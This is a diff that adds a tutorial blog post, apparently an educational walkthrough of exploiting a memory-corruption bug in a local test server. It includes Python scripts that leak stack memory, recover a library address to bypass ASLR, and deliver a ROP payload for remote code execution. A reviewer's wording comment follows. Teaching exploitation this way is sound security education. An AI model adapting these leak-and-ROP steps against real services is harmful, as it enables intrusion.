content/post/walkthrough-exploiting-bugs-to-gain-code-execution.md

```diff
@@ -0,0 +1,338 @@
+
+By overwriting the offset, we can get the program to dump its memory for us:
+
+```
+#!/usr/bin/env python
+
+import socket, struct, time
+
+s = socket.create_connection(('127.0.0.1', 2000))
+s.send('x' * 512) # fill _recvBuffer
+s.send('y' * 4)   # fill _recvOffset alignment padding
+s.send(struct.pack('<Q', 0x300)) # fill _recvBytes
+time.sleep(1) # send the newline after _recvOffset has been overwritten
+s.send('\n')
+print(s.recv(4096).encode('hex'))
+```
+
+This happens to be stack memory, so if we were to dump more, we could actually get a lot of interesting information including environment variables. That alone can be really valuable since a lot of people carry the bad habit of putting sensitive information in environment variables, but what we want to get out of this is the offset of the libraries. Just look through the dump for a pointer to anything in one of those libraries.
+
+The first one I see is a pointer to ``libdyld.dylib`start``. So using that, we can exploit a remote machine with a three-step process...
+
+**Step 1** – Get a library address:
+
+```
+#!/usr/bin/env python
+
+import socket, struct, time
+
+s = socket.create_connection(('127.0.0.1', 2000))
+s.send('x' * 512) # fill _recvBuffer
+s.send('y' * 4)   # fill _recvOffset alignment padding
+s.send('\x00\x03\x00\x00\x00\x00\x00\x00') # fill _recvOffset
+time.sleep(1) # send the newline after _recvOffset has been overwritten
+s.send('\n')
+address = struct.unpack_from('<Q', s.recv(4096), 516 + 21 * 8)[0] - 0x35C9
+print('/usr/lib/system/libdyld.dylib is at 0x{:x}'.format(address))
+```
+
+**Step 2** – Compile the ROP payload with the obtained address
+
+**Step 3** – Send the payload:
+
+```
+#!/usr/bin/env python
+
+import socket, struct, time
+
+rop_payload = '252ba693ff7f0000020000...' // put your ROP payload here
+
+s = socket.create_connection(('127.0.0.1', 2000))
+s.send('x' * 512) # fill _recvBuffer
+s.send('y' * 4)   # fill _recvOffset alignment padding
+s.send(struct.pack('<Q', 512+8*20)) # this should be the offset of a return address
+time.sleep(1) # send the rest after _recvOffset has been overwritten
+s.send(rop_payload.decode('hex') + '\n')
+print('package deployed')
+response = s.recv(4096)
+if response:
+    print(response.encode('hex'))
+
+```
+
+And there you have it! A fully developed remote code execution exploit on a modern OS.
+
+I feel I would be amiss if I didn't at least mention one other common security measure we didn't have to talk about here: the [stack canary](https://en.wikipedia.org/wiki/Buffer_overflow_protection#Canaries). This particular vulnerability made it easy to just jump right over the stack canary, but they do often come into play with these kinds of things.
```

Comment:
I don't think you would be amiss, but I think something would. Not the guide... perhaps the information conveyed? Honestly, I'm not totally sure how to use that word outside of the textbook definitions.

>I feel there would be something amiss if I didn't